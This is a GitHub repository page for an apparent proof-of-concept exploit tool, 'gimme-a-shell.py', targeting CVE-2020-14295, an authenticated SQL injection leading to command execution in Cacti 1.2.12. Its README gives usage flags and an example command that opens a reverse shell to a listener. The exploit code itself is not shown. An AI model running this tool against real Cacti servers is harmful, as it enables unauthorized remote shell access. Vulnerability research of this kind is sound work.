Skip to content
/ CVE-2020-14295 Public

Authenticated SQL injection to command execution on Cacti 1.2.12

License

GPL-3.0 license
2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0z09e/CVE-2020-14295

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

gimme-a-shell.py

gimme-a-shell.py

 
 

requirements.txt

requirements.txt

 
 

Repository files navigation

CVE-2020-14295

Vulnerability details - Cacti/cacti#3622

Install

pip3 install -r requirements.txt

Usage

$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port

optional arguments:
  -h, --help     show this help message and exit

required arguments:
  -t Target      Target URL
  -U Username    Cacti username
  -P Password    Cacti password
  -i Shell-IP    Reverse-Shell IP
  -p Shell-Port  Reverse-Shell Port

Example

./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001

About

Authenticated SQL injection to command execution on Cacti 1.2.12

Resources

Readme

License

GPL-3.0 license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages